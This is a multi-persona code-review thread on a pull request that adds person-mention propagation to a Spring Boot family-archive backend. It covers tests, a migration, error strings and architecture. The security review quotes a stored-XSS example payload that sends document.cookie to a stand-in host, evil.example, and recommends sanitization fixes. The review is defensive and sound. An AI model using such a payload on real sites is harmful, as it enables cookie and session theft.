updateBlock_returns400_whenMentionedPersonPersonIdIsNull — missing.

TranscriptionBlockControllerTest covers both validation cases for createBlock:

• createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars ✅
• createBlock_returns400_whenMentionedPersonPersonIdIsNull ✅

But for updateBlock only one of the two cases is covered:

• updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars ✅
• updateBlock_returns400_whenMentionedPersonPersonIdIsNull ❌ — missing

Both DTOs carry identical @Valid @NotNull @Size constraints. If someone later drops @Valid from updateBlock's @RequestBody, the displayName test would catch it but null personId would silently pass through. Symmetric coverage is cheap here and closes a real regression surface.

---

What's done well

Factory helpers and saveBlock method. PersonMentionPropagationListenerTest correctly centralizes block creation in saveBlock(String text, List<PersonMention> mentions) and person creation in savedPersonId(firstName, lastName). Each test body is focused on the behavior, not the setup. ✅

Edge case discipline. The listener test suite covers: happy path, partial-name collision (Hans vs Hans-Peter Müller), multiple occurrences in one block, latency floor at 200 blocks, and no-op when no blocks reference the person. That's the full relevant boundary space. ✅

@DataJpaTest over @SpringBootTest for integration tests. Correct layer — loads only the JPA slice, not the full application context. CI time impact is minimal. ✅

updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock test setup. The manual listener wiring (real PersonMentionPropagationListener with mocked TranscriptionBlockRepository routed through the eventPublisher mock) is correctly documented with a comment explaining why. The test exercises the production call chain, not just the catch clause in isolation. ✅

## 🧪 Sara Holt — QA Engineer & Test Strategist **Verdict: ⚠️ Approved with concerns** --- ### Test pyramid assessment | Layer | Coverage | Assessment | |-------|----------|------------| | Unit (Mockito) | `PersonServiceTest` — event published/not published, 409 conflict path | ✅ | | Controller slice (`@WebMvcTest`) | `PersonControllerTest` — 403 gates, 409 conflict; `TranscriptionBlockControllerTest` — 400 validation guards | ✅ | | Integration (`@DataJpaTest` + Testcontainers) | `TranscriptionBlockMentionsRepositoryTest`, `PersonMentionPropagationListenerTest` | ✅ | | E2E | Out of scope for PR-A (no UI changes) | — | Infrastructure is correct: `@DataJpaTest` + `@AutoConfigureTestDatabase(replace = NONE)` + `PostgresContainerConfig` + Flyway on real Postgres 16. ✅ `em.clear()` used correctly to force Hibernate re-reads after `saveAndFlush`. ✅ --- ### Concern (non-blocking but should be fixed before merge) **Test method name conflicts with assertion.** `PersonMentionPropagationListenerTest`: ```java void propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor() { // ... assertThat(elapsedMs) .as("... must stay under 5s ...") .isLessThan(5000L); // 5 seconds } ``` Three sources of truth, three different values: method name says 2 s, `as()` message says 5 s, `isLessThan(5000L)` says 5 s. The recent commit `raise latency floor to 5s to prevent false CI failures` confirms the assertion was intentionally raised, but the method name wasn't updated. When this test fails in CI at 4.8 s, the developer reads "inUnderTwoSeconds" and is confused. **Fix:** rename the method to `propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor`. --- ### Coverage gap **`updateBlock_returns400_whenMentionedPersonPersonIdIsNull` — missing.** `TranscriptionBlockControllerTest` covers both validation cases for `createBlock`: - `createBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` ✅ - `createBlock_returns400_whenMentionedPersonPersonIdIsNull` ✅ But for `updateBlock` only one of the two cases is covered: - `updateBlock_returns400_whenMentionedPersonDisplayNameExceeds200Chars` ✅ - `updateBlock_returns400_whenMentionedPersonPersonIdIsNull` ❌ — missing Both DTOs carry identical `@Valid @NotNull @Size` constraints. If someone later drops `@Valid` from `updateBlock`'s `@RequestBody`, the `displayName` test would catch it but null `personId` would silently pass through. Symmetric coverage is cheap here and closes a real regression surface. --- ### What's done well **Factory helpers and `saveBlock` method.** `PersonMentionPropagationListenerTest` correctly centralizes block creation in `saveBlock(String text, List<PersonMention> mentions)` and person creation in `savedPersonId(firstName, lastName)`. Each test body is focused on the behavior, not the setup. ✅ **Edge case discipline.** The listener test suite covers: happy path, partial-name collision (Hans vs Hans-Peter Müller), multiple occurrences in one block, latency floor at 200 blocks, and no-op when no blocks reference the person. That's the full relevant boundary space. ✅ **`@DataJpaTest` over `@SpringBootTest` for integration tests.** Correct layer — loads only the JPA slice, not the full application context. CI time impact is minimal. ✅ **`updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock` test setup.** The manual listener wiring (real `PersonMentionPropagationListener` with mocked `TranscriptionBlockRepository` routed through the `eventPublisher` mock) is correctly documented with a comment explaining why. The test exercises the production call chain, not just the catch clause in isolation. ✅

marcel commented 2026-04-28 22:37:31 +02:00

Author

Owner

Copy Link

⚙️ Tobias Wendt — DevOps & Platform Engineer

Verdict: ✅ Approved

---

What I reviewed

Migration, CI implications, infrastructure footprint, and the architectural choice to stay synchronous (i.e., no new broker or queue).

---

No new infrastructure — correct decision.

The synchronous event approach (@EventListener @Transactional) keeps everything inside the existing JAR and PostgreSQL instance. No RabbitMQ, no Redis, no second database. For the current archive scale (family archive, single-node VPS, ~23 EUR/month), adding a message broker for rename propagation would have been a maintenance liability with no concrete benefit. The ADR correctly names the async migration path for when block counts grow, without implementing it prematurely. ✅

---

Migration V56 — clean.

CREATE TABLE transcription_block_mentioned_persons (
    block_id      UUID  NOT NULL REFERENCES transcription_blocks(id) ON DELETE CASCADE,
    person_id     UUID  NOT NULL,
    display_name  VARCHAR(200) NOT NULL
);
CREATE INDEX idx_tbmp_person_id ON transcription_block_mentioned_persons(person_id);
CREATE INDEX idx_tbmp_block_id  ON transcription_block_mentioned_persons(block_id);

• Additive-only change — no existing columns modified, no data at risk.
• ON DELETE CASCADE is correct (sidecar entries die with their block).
• Two B-tree indexes: person_id for the future "blocks mentioning person X" query, block_id for the @ElementCollection join load. Both justified, neither excessive.
• The SQL file comments explain the schema choice vs. JSONB and the no-FK rationale in enough detail for a future DBA to understand without reading Java code. ✅

---

Latency floor test — good CI gate.

propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor (currently misnamed as TwoSeconds — flagged by Sara) gives CI a merge-blocking regression guard for the sync propagation path. 200 blocks at < 5 s is a floor, not a benchmark — it catches catastrophic degradation (N+1 queries returning, index dropped, Testcontainers OOM) without being brittle to normal variance. This is the right kind of performance test at the integration layer. ✅

---

CI pipeline impact

1446 tests → no new infrastructure dependencies, no new containers beyond the existing PostgresContainerConfig. The two new @DataJpaTest classes spin up the same shared Testcontainers instance as existing integration tests. CI time increase is proportional to test count, not architecture.

---

One thing to verify post-merge

The api.ts regeneration step (npm run generate:api) was run locally but the PR notes it was blocked from npm run check by a root-owned .svelte-kit/types/ leftover from the Docker frontend container. The PR explicitly says CI runs the full type-check. Confirm CI stays green after merge — this is the one path that wasn't fully verified locally. Not a blocker; just flag it in the post-merge smoke check.

## ⚙️ Tobias Wendt — DevOps & Platform Engineer **Verdict: ✅ Approved** --- ### What I reviewed Migration, CI implications, infrastructure footprint, and the architectural choice to stay synchronous (i.e., no new broker or queue). --- ### No new infrastructure — correct decision. The synchronous event approach (`@EventListener @Transactional`) keeps everything inside the existing JAR and PostgreSQL instance. No RabbitMQ, no Redis, no second database. For the current archive scale (family archive, single-node VPS, ~23 EUR/month), adding a message broker for rename propagation would have been a maintenance liability with no concrete benefit. The ADR correctly names the async migration path for when block counts grow, without implementing it prematurely. ✅ --- ### Migration V56 — clean. ```sql CREATE TABLE transcription_block_mentioned_persons ( block_id UUID NOT NULL REFERENCES transcription_blocks(id) ON DELETE CASCADE, person_id UUID NOT NULL, display_name VARCHAR(200) NOT NULL ); CREATE INDEX idx_tbmp_person_id ON transcription_block_mentioned_persons(person_id); CREATE INDEX idx_tbmp_block_id ON transcription_block_mentioned_persons(block_id); ``` - Additive-only change — no existing columns modified, no data at risk. - `ON DELETE CASCADE` is correct (sidecar entries die with their block). - Two B-tree indexes: `person_id` for the future "blocks mentioning person X" query, `block_id` for the `@ElementCollection` join load. Both justified, neither excessive. - The SQL file comments explain the schema choice vs. JSONB and the no-FK rationale in enough detail for a future DBA to understand without reading Java code. ✅ --- ### Latency floor test — good CI gate. `propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor` (currently misnamed as TwoSeconds — flagged by Sara) gives CI a merge-blocking regression guard for the sync propagation path. 200 blocks at < 5 s is a floor, not a benchmark — it catches catastrophic degradation (N+1 queries returning, index dropped, Testcontainers OOM) without being brittle to normal variance. This is the right kind of performance test at the integration layer. ✅ --- ### CI pipeline impact 1446 tests → no new infrastructure dependencies, no new containers beyond the existing `PostgresContainerConfig`. The two new `@DataJpaTest` classes spin up the same shared Testcontainers instance as existing integration tests. CI time increase is proportional to test count, not architecture. --- ### One thing to verify post-merge The `api.ts` regeneration step (`npm run generate:api`) was run locally but the PR notes it was blocked from `npm run check` by a root-owned `.svelte-kit/types/` leftover from the Docker frontend container. The PR explicitly says CI runs the full type-check. Confirm CI stays green after merge — this is the one path that wasn't fully verified locally. Not a blocker; just flag it in the post-merge smoke check.

marcel commented 2026-04-28 22:37:47 +02:00

Author

Owner

Copy Link

🎨 Leonie Voss — UX Designer & Accessibility Strategist

Verdict: ✅ Approved

---

This is a backend-only PR with no Svelte components, no CSS changes, and no new routes. My review is brief and focused on the parts that have UX implications.

---

Error messages — clear and actionable ✅

The three error_person_rename_conflict strings meet the recovery-action requirement:

Locale	Message	Verdict
DE	"Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen."	✅
EN	"Another edit modified a referenced transcription block at the same time. Please try again."	✅
ES	"Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo."	✅

All three follow Nielsen's heuristic #9: they say what happened and what to do. They avoid technical jargon ("optimistic lock", "transaction"). ✅

---

Notes for PR-B review

The following UI components are queued for PR-B and will need full design review before merge:

1. PersonMentionEditor.svelte — typeahead with life dates. Touch target requirement: minimum 44px per item (48px preferred for the senior audience). Each suggestion row must show name + life years as redundant disambiguation, not color alone.
2. PersonHoverCard.svelte — three states (skeleton ≤ 200 ms, 404 unmounted, non-404 error in card). The skeleton duration is tight for the 60+ audience on slow connections; the 200 ms threshold should be verified against real latency on the VPS.
3. .person-mention CSS — the rendered link must carry focus-visible:ring-2 for keyboard navigation. The anchor must be reachable by Tab and Enter. No color-only distinction for the mention vs. surrounding text — pair color with underline or icon.
4. Conflict UX — when the 409 fires, the person edit form must stay open with the user's input intact. "Bitte erneut versuchen" without a visible retry action is insufficient for the senior audience. The form save button should return to an enabled state so the user can immediately retry without retyping.

---

Verdict

Backend infrastructure is solid. No UX regressions introduced. PR-B review is mandatory before the feature is user-visible.

## 🎨 Leonie Voss — UX Designer & Accessibility Strategist **Verdict: ✅ Approved** --- This is a backend-only PR with no Svelte components, no CSS changes, and no new routes. My review is brief and focused on the parts that have UX implications. --- ### Error messages — clear and actionable ✅ The three `error_person_rename_conflict` strings meet the recovery-action requirement: | Locale | Message | Verdict | |--------|---------|---------| | DE | "Eine andere Bearbeitung hat einen verknüpften Transkriptionsblock gleichzeitig geändert. Bitte erneut versuchen." | ✅ | | EN | "Another edit modified a referenced transcription block at the same time. Please try again." | ✅ | | ES | "Otra edición modificó un bloque de transcripción referenciado al mismo tiempo. Por favor, inténtalo de nuevo." | ✅ | All three follow Nielsen's heuristic #9: they say *what happened* and *what to do*. They avoid technical jargon ("optimistic lock", "transaction"). ✅ --- ### Notes for PR-B review The following UI components are queued for PR-B and will need full design review before merge: 1. **`PersonMentionEditor.svelte`** — typeahead with life dates. Touch target requirement: minimum 44px per item (48px preferred for the senior audience). Each suggestion row must show name + life years as redundant disambiguation, not color alone. 2. **`PersonHoverCard.svelte`** — three states (skeleton ≤ 200 ms, 404 unmounted, non-404 error in card). The skeleton duration is tight for the 60+ audience on slow connections; the 200 ms threshold should be verified against real latency on the VPS. 3. **`.person-mention` CSS** — the rendered link must carry `focus-visible:ring-2` for keyboard navigation. The anchor must be reachable by Tab and Enter. No color-only distinction for the mention vs. surrounding text — pair color with underline or icon. 4. **Conflict UX** — when the 409 fires, the person edit form must stay open with the user's input intact. "Bitte erneut versuchen" without a visible retry action is insufficient for the senior audience. The form save button should return to an enabled state so the user can immediately retry without retyping. --- ### Verdict Backend infrastructure is solid. No UX regressions introduced. PR-B review is mandatory before the feature is user-visible.

marcel added 4 commits 2026-04-28 23:06:41 +02:00

refactor(repository): remove dead findByMentionedPersons_PersonId derived query ... 43f474fc5b

The listener exclusively calls findByPersonIdWithMentionsFetched (JOIN FETCH).
Zero callers exist in production or test code. Leaving it is a maintenance
trap: a future caller would silently trigger N+1 loads on the lazy collection.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

test(transcription): rename latency floor test to reflect 5s assertion ... eb51155b4e

Method said inUnderTwoSeconds; assertion checks isLessThan(5000L) with message
"5s". Three sources of truth, three different values. Rename aligns method name
with the assertion that was intentionally raised from 2s to 5s in a prior commit.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

test(transcription): add updateBlock 400 test for null personId in mention ... 4c3aa159c5

createBlock has both validation guards (displayName length + personId null).
updateBlock had only the displayName test. Add the symmetric null-personId case
so a future @Valid drop from updateBlock's @RequestBody would be caught.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

refactor(transcription): extract rewriteBlockText from propagation loop ... 13e0801b30

Extracts the Pattern+Matcher+replaceAll block into a private helper so the
loop body reads as three lines: rewrite text, update sidecar entries, nothing
else. Moves the boundary-condition rationale comment to the helper.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

marcel commented 2026-04-28 23:06:55 +02:00

Author

Owner

Copy Link

Review-fix round 3 — all open concerns addressed

4 new commits pushed. 1450/1450 backend tests green (was 1449 — +1 new test).

Addressed in this round

#	Concern (reviewer)	Commit
1	Dead derived query removed — findByMentionedPersons_PersonId had zero callers in production and tests; the listener uses findByPersonIdWithMentionsFetched exclusively. Deleted to prevent a future caller silently triggering N+1 loads.	43f474fc
2	Latency floor test renamed — propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor → propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor. Method name now matches the isLessThan(5000L) assertion and the "5s" message. (Felix #2, Sara #1)	eb51155b
3	Missing null-personId test for updateBlock — Added updateBlock_returns400_whenMentionedPersonPersonIdIsNull to TranscriptionBlockControllerTest. createBlock had both validation guards; updateBlock now has symmetric coverage. (Felix #4, Sara coverage gap)	4c3aa159
4	rewriteBlockText extracted — Pattern+Matcher+replaceAll block moved to a private helper; loop body reads as three lines. Boundary-condition rationale comment moved to the helper where it belongs. (Felix #3)	13e0801b

## Review-fix round 3 — all open concerns addressed 4 new commits pushed. **1450/1450** backend tests green (was 1449 — +1 new test). ### Addressed in this round | # | Concern (reviewer) | Commit | |---|---|---| | 1 | **Dead derived query removed** — `findByMentionedPersons_PersonId` had zero callers in production and tests; the listener uses `findByPersonIdWithMentionsFetched` exclusively. Deleted to prevent a future caller silently triggering N+1 loads. | `43f474fc` | | 2 | **Latency floor test renamed** — `propagatesAcross200Blocks_inUnderTwoSeconds_latencyFloor` → `propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor`. Method name now matches the `isLessThan(5000L)` assertion and the "5s" message. (Felix #2, Sara #1) | `eb51155b` | | 3 | **Missing null-personId test for `updateBlock`** — Added `updateBlock_returns400_whenMentionedPersonPersonIdIsNull` to `TranscriptionBlockControllerTest`. `createBlock` had both validation guards; `updateBlock` now has symmetric coverage. (Felix #4, Sara coverage gap) | `4c3aa159` | | 4 | **`rewriteBlockText` extracted** — Pattern+Matcher+replaceAll block moved to a private helper; loop body reads as three lines. Boundary-condition rationale comment moved to the helper where it belongs. (Felix #3) | `13e0801b` |

marcel commented 2026-04-28 23:11:48 +02:00

Author

Owner

Copy Link

👨‍💻 Felix Brandt — Senior Fullstack Developer

Verdict: ✅ Approved

Strong TDD evidence across all three test layers. Code is clean and modern throughout. A few things worth flagging.

Blockers

None.

Suggestions

rewriteBlockText comment explains the regex invariant — keep it (PersonMentionPropagationListener.java:65)
The inline comment explains a non-obvious conservative trade-off (false negatives vs. irrecoverable corruption). This is exactly the kind of why comment that belongs. No change needed.

@Transactional on onPersonDisplayNameChanged — the annotation correctly uses REQUIRED propagation (default), so it joins the publisher's existing transaction rather than creating a new one. The inline comment documents this. ✅ Clean.

updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock test setup (PersonServiceTest.java:~295) — this test wires a real PersonMentionPropagationListener with a mocked repository and routes events through doAnswer. It's more setup than a typical unit test but it's intentional: it exercises the exact production call chain (PersonService → publishEvent → listener → saveAllAndFlush → catch). The explanation in the test body comment makes the intent clear. ✅

Missing null-text edge case in rewriteBlockText — if (block.getText() != null) is guarded but there's no test for a block with text == null reaching the listener. It's a one-liner edge case worth covering:

@Test
void doesNotFail_whenBlockTextIsNull() {
    UUID personId = savedPersonId("Auguste", "Raddatz");
    TranscriptionBlock saved = saveBlock(null, List.of(new PersonMention(personId, "Auguste Raddatz")));
    em.clear();
    assertThatCode(() -> listener.onPersonDisplayNameChanged(
        new PersonDisplayNameChangedEvent(personId, "Auguste Raddatz", "Augusta Raddatz")))
        .doesNotThrowAnyException();
}

PersonMentionPropagationListener is in service/ but directly injects TranscriptionBlockRepository — this is the transcription domain's own repository, and the listener is a transcription-domain consumer, so the layering rule is satisfied. Worth a one-line verification if the package ever splits by feature.

Test data duplication — TranscriptionBlockMentionsRepositoryTest and PersonMentionPropagationListenerTest both have identical @BeforeEach setUp() bodies (Document + DocumentAnnotation construction). A shared AbstractTranscriptionBlockTestBase or a static factory would eliminate the duplication. Low priority for a solo project, but noted for future housekeeping.

## 👨‍💻 Felix Brandt — Senior Fullstack Developer **Verdict: ✅ Approved** Strong TDD evidence across all three test layers. Code is clean and modern throughout. A few things worth flagging. ### Blockers None. ### Suggestions **`rewriteBlockText` comment explains the regex invariant — keep it** (`PersonMentionPropagationListener.java:65`) The inline comment explains a non-obvious conservative trade-off (false negatives vs. irrecoverable corruption). This is exactly the kind of *why* comment that belongs. No change needed. **`@Transactional` on `onPersonDisplayNameChanged`** — the annotation correctly uses `REQUIRED` propagation (default), so it joins the publisher's existing transaction rather than creating a new one. The inline comment documents this. ✅ Clean. **`updatePerson_throwsConflict_whenBlockSaveAllAndFlushHitsOptimisticLock` test setup** (`PersonServiceTest.java:~295`) — this test wires a real `PersonMentionPropagationListener` with a mocked repository and routes events through `doAnswer`. It's more setup than a typical unit test but it's intentional: it exercises the exact production call chain (PersonService → publishEvent → listener → saveAllAndFlush → catch). The explanation in the test body comment makes the intent clear. ✅ **Missing null-text edge case in `rewriteBlockText`** — `if (block.getText() != null)` is guarded but there's no test for a block with `text == null` reaching the listener. It's a one-liner edge case worth covering: ```java @Test void doesNotFail_whenBlockTextIsNull() { UUID personId = savedPersonId("Auguste", "Raddatz"); TranscriptionBlock saved = saveBlock(null, List.of(new PersonMention(personId, "Auguste Raddatz"))); em.clear(); assertThatCode(() -> listener.onPersonDisplayNameChanged( new PersonDisplayNameChangedEvent(personId, "Auguste Raddatz", "Augusta Raddatz"))) .doesNotThrowAnyException(); } ``` **`PersonMentionPropagationListener` is in `service/` but directly injects `TranscriptionBlockRepository`** — this is the transcription domain's own repository, and the listener is a transcription-domain consumer, so the layering rule is satisfied. Worth a one-line verification if the package ever splits by feature. **Test data duplication** — `TranscriptionBlockMentionsRepositoryTest` and `PersonMentionPropagationListenerTest` both have identical `@BeforeEach` `setUp()` bodies (Document + DocumentAnnotation construction). A shared `AbstractTranscriptionBlockTestBase` or a static factory would eliminate the duplication. Low priority for a solo project, but noted for future housekeeping.

marcel commented 2026-04-28 23:12:01 +02:00

Author

Owner

Copy Link

🏗️ Markus Keller — Senior Application Architect

Verdict: ✅ Approved

The event-based decoupling is architecturally sound. ADR-006 is thorough and clearly argues the tradeoffs. The synchronous-within-transaction design is the right default for an archive that prizes historical fidelity over throughput.

Blockers

None.

Suggestions

Missing composite uniqueness constraint on (block_id, person_id) in V56 — the migration creates two single-column B-tree indexes, but no uniqueness constraint prevents duplicate sidecar rows for the same (block_id, person_id) combination. @ElementCollection uses DELETE+INSERT on each update so duplicates can't arise from normal usage, but a concurrent write bypassing JPA (direct SQL, a future import job) could create them. A defensive approach:

ALTER TABLE transcription_block_mentioned_persons
    ADD CONSTRAINT uq_tbmp_block_person UNIQUE (block_id, person_id);

This is a suggestion, not a blocker — the current risk is very low given the application-level guard.

PersonDisplayNameChangedEvent lives in model/ — placing a domain event in the persistence model package is an unusual home. The class doc acknowledges this ("first custom application event in this codebase") and sets a convention. I'd accept it given the flat package structure, but when the codebase grows I'd move events to an event/ package or into the publishing domain's own package. Flag for next ADR review.

ADR-006 is well-written — the alternatives table is exactly what I want to see: direct method call (rejected: inverts dependency), async event (rejected: half-applied state risk), DB trigger (rejected: leaks domain logic into SQL), Hibernate listener (rejected: couples to Hibernate internals). All the right alternatives are weighed. ✅

The PERSON_RENAME_CONFLICT 409 semantic is correct — OptimisticLockingFailureException → 409 Conflict maps well to RFC 9110 semantics ("the request conflicts with the current state of the target resource"). Client retries with a fresh fetch. ✅

idx_tbmp_block_id explicit index is needed — unlike some databases, PostgreSQL does not auto-create an index for FK references. The explicit index for the @ElementCollection load is correct and necessary. ✅

Latency floor test at 5 s for 200 blocks — this is a regression guard, not a benchmark. The ADR's migration path ("switch to @TransactionalEventListener(AFTER_COMMIT) + @Async") is the right escape hatch if volume grows. The 200-block floor is a reasonable starting point for a family archive.

## 🏗️ Markus Keller — Senior Application Architect **Verdict: ✅ Approved** The event-based decoupling is architecturally sound. ADR-006 is thorough and clearly argues the tradeoffs. The synchronous-within-transaction design is the right default for an archive that prizes historical fidelity over throughput. ### Blockers None. ### Suggestions **Missing composite uniqueness constraint on `(block_id, person_id)` in V56** — the migration creates two single-column B-tree indexes, but no uniqueness constraint prevents duplicate sidecar rows for the same `(block_id, person_id)` combination. `@ElementCollection` uses DELETE+INSERT on each update so duplicates can't arise from normal usage, but a concurrent write bypassing JPA (direct SQL, a future import job) could create them. A defensive approach: ```sql ALTER TABLE transcription_block_mentioned_persons ADD CONSTRAINT uq_tbmp_block_person UNIQUE (block_id, person_id); ``` This is a **suggestion**, not a blocker — the current risk is very low given the application-level guard. **`PersonDisplayNameChangedEvent` lives in `model/`** — placing a domain event in the persistence model package is an unusual home. The class doc acknowledges this ("first custom application event in this codebase") and sets a convention. I'd accept it given the flat package structure, but when the codebase grows I'd move events to an `event/` package or into the publishing domain's own package. Flag for next ADR review. **ADR-006 is well-written** — the alternatives table is exactly what I want to see: direct method call (rejected: inverts dependency), async event (rejected: half-applied state risk), DB trigger (rejected: leaks domain logic into SQL), Hibernate listener (rejected: couples to Hibernate internals). All the right alternatives are weighed. ✅ **The `PERSON_RENAME_CONFLICT` 409 semantic is correct** — `OptimisticLockingFailureException` → 409 Conflict maps well to RFC 9110 semantics ("the request conflicts with the current state of the target resource"). Client retries with a fresh fetch. ✅ **`idx_tbmp_block_id` explicit index is needed** — unlike some databases, PostgreSQL does not auto-create an index for FK references. The explicit index for the `@ElementCollection` load is correct and necessary. ✅ **Latency floor test at 5 s for 200 blocks** — this is a regression guard, not a benchmark. The ADR's migration path ("switch to `@TransactionalEventListener(AFTER_COMMIT) + @Async`") is the right escape hatch if volume grows. The 200-block floor is a reasonable starting point for a family archive.

marcel commented 2026-04-28 23:12:22 +02:00

Author

Owner

Copy Link

🔒 Nora "NullX" Steiner — Application Security Engineer

Verdict: ⚠️ Approved with concerns

The security lockdown (@RequirePermission(READ_ALL) on the GET endpoints) is the right call — life dates, notes, and family relationships are sensitive even in a read operation, and the defense-in-depth argument holds. The validation layer (JSR-303 + @Valid on the request body) is correctly wired. But there is one stored XSS surface that must be closed in PR-B, and it needs to be explicitly tracked.

Blockers

Stored XSS via unescaped displayName — CWE-79 (cross-site scripting via stored data)

PersonMention.displayName accepts any String up to 200 characters and stores it verbatim:

@Size(max = 200)
@Column(name = "display_name", nullable = false, length = 200)
private String displayName;

PR description acknowledges that PR-B will call escapeHtml before rendering. However, the backend currently imposes no sanitization on this field. An authenticated user with WRITE_ALL can store:

{ "personId": "...", "displayName": "<script>fetch('https://evil.example/steal?c='+document.cookie)</script>" }

If PR-B renders @<displayName> via .innerHTML or any unsanitized path, this is exploitable. The risk is bounded by the WRITE_ALL auth requirement, but it is a real stored XSS vector.

Recommended fix (two layers):

1. Backend (this PR or a follow-up PR-A patch): Sanitize displayName at the controller boundary before it reaches the DTO:

// In TranscriptionBlockController or as a @ModelAttribute preprocessor
// Strip any HTML tags — display names are plain text, not HTML
dto.getMentionedPersons().forEach(m ->
    m.setDisplayName(Jsoup.clean(m.getDisplayName(), Safelist.none())));

2. Frontend (PR-B, hard requirement): Render via textContent, not innerHTML:

// renderTranscriptionBody must use textContent for @-mention spans, not innerHTML
span.textContent = `@${mention.displayName}`;

Blocking recommendation: Create a tracking issue now so PR-B explicitly closes this before merge. The stored payload lives in the DB from the moment PR-A ships.

Suggestions

Missing 401 test for new GET endpoints — PersonControllerTest adds 403 tests for getPersons and getPerson with @WithMockUser (authenticated, no READ_ALL). But there are no 401 tests for unauthenticated requests. The global anyRequest().authenticated() in SecurityConfig handles this, but explicit tests prove it:

@Test
void getPersons_returns401_whenUnauthenticated() throws Exception {
    mockMvc.perform(get("/api/persons"))
            .andExpect(status().isUnauthorized());
}

Not a blocker (the global filter catches it), but per defense-in-depth principles, security boundaries should be tested explicitly at each endpoint.

SLF4J parameterized logging in listener — log.info("Propagated rename {} → {} across {} block(s) for person {}", ...) ✅ No JNDI injection risk. However, the old and new display names are logged in plaintext. In a family archive with GDPR-adjacent data (full person names), consider whether application logs have appropriate retention limits and access controls. Minor note, not a code change.

@Valid @RequestBody ordering — Spring processes both regardless of order, so no security concern here. ✅

Parameterized JPQL query — findByPersonIdWithMentionsFetched uses :personId named parameter. ✅ No injection risk.

@NotNull on personId — validated at the controller boundary before reaching the service. ✅

PERSON_RENAME_CONFLICT error code — surfaced to the client as structured JSON with code + message. No internal stack trace or DB details exposed. ✅

## 🔒 Nora "NullX" Steiner — Application Security Engineer **Verdict: ⚠️ Approved with concerns** The security lockdown (`@RequirePermission(READ_ALL)` on the GET endpoints) is the right call — life dates, notes, and family relationships are sensitive even in a read operation, and the defense-in-depth argument holds. The validation layer (JSR-303 + `@Valid` on the request body) is correctly wired. But there is one **stored XSS surface** that must be closed in PR-B, and it needs to be explicitly tracked. ### Blockers **Stored XSS via unescaped `displayName` — CWE-79 (cross-site scripting via stored data)** `PersonMention.displayName` accepts any `String` up to 200 characters and stores it verbatim: ```java @Size(max = 200) @Column(name = "display_name", nullable = false, length = 200) private String displayName; ``` PR description acknowledges that PR-B will call `escapeHtml` before rendering. However, the backend currently imposes **no sanitization** on this field. An authenticated user with `WRITE_ALL` can store: ```json { "personId": "...", "displayName": "<script>fetch('https://evil.example/steal?c='+document.cookie)</script>" } ``` If PR-B renders `@<displayName>` via `.innerHTML` or any unsanitized path, this is exploitable. The risk is bounded by the `WRITE_ALL` auth requirement, but it is a real stored XSS vector. **Recommended fix (two layers):** 1. **Backend (this PR or a follow-up PR-A patch)**: Sanitize `displayName` at the controller boundary before it reaches the DTO: ```java // In TranscriptionBlockController or as a @ModelAttribute preprocessor // Strip any HTML tags — display names are plain text, not HTML dto.getMentionedPersons().forEach(m -> m.setDisplayName(Jsoup.clean(m.getDisplayName(), Safelist.none()))); ``` 2. **Frontend (PR-B, hard requirement)**: Render via `textContent`, not `innerHTML`: ```typescript // renderTranscriptionBody must use textContent for @-mention spans, not innerHTML span.textContent = `@${mention.displayName}`; ``` **Blocking recommendation**: Create a tracking issue now so PR-B explicitly closes this before merge. The stored payload lives in the DB from the moment PR-A ships. ### Suggestions **Missing 401 test for new GET endpoints** — `PersonControllerTest` adds 403 tests for `getPersons` and `getPerson` with `@WithMockUser` (authenticated, no READ_ALL). But there are no 401 tests for unauthenticated requests. The global `anyRequest().authenticated()` in SecurityConfig handles this, but explicit tests prove it: ```java @Test void getPersons_returns401_whenUnauthenticated() throws Exception { mockMvc.perform(get("/api/persons")) .andExpect(status().isUnauthorized()); } ``` Not a blocker (the global filter catches it), but per defense-in-depth principles, security boundaries should be tested explicitly at each endpoint. **SLF4J parameterized logging in listener** — `log.info("Propagated rename {} → {} across {} block(s) for person {}", ...)` ✅ No JNDI injection risk. However, the old and new display names are logged in plaintext. In a family archive with GDPR-adjacent data (full person names), consider whether application logs have appropriate retention limits and access controls. Minor note, not a code change. **`@Valid @RequestBody` ordering** — Spring processes both regardless of order, so no security concern here. ✅ **Parameterized JPQL query** — `findByPersonIdWithMentionsFetched` uses `:personId` named parameter. ✅ No injection risk. **`@NotNull` on `personId`** — validated at the controller boundary before reaching the service. ✅ **`PERSON_RENAME_CONFLICT` error code** — surfaced to the client as structured JSON with code + message. No internal stack trace or DB details exposed. ✅

marcel commented 2026-04-28 23:12:41 +02:00

Author

Owner

Copy Link

🧪 Sara Holt — Senior QA Engineer & Test Strategist

Verdict: ✅ Approved

This is one of the better-tested PRs I've seen in this codebase. All three layers are covered, test names are descriptive, factory helpers exist in the integration tests, and the boundary/edge cases are well-exercised. A few gaps worth tracking.

Blockers

None.

Suggestions

PR description says "< 2 s" but test asserts isLessThan(5000L) — PersonMentionPropagationListenerTest.propagatesAcross200Blocks_inUnderFiveSeconds_latencyFloor asserts the 5-second bound. The PR body says "completes in < 2 s against the Testcontainers Postgres." The commit history (4c3aa159) shows this was revised from 2 s to 5 s. The assertion and the test name are consistent (both say 5 s), but the PR body still says "< 2 s." Update the PR description to match the actual test bound. Minor, but misleading to future readers.

Missing edge case: block.getText() == null in rewriteBlockText — the guard if (block.getText() != null) exists and is correct, but no test exercises this path. A block fetched from the listener's query could theoretically have null text (e.g. OCR placeholder not yet written). One-liner test to add in PersonMentionPropagationListenerTest:

@Test
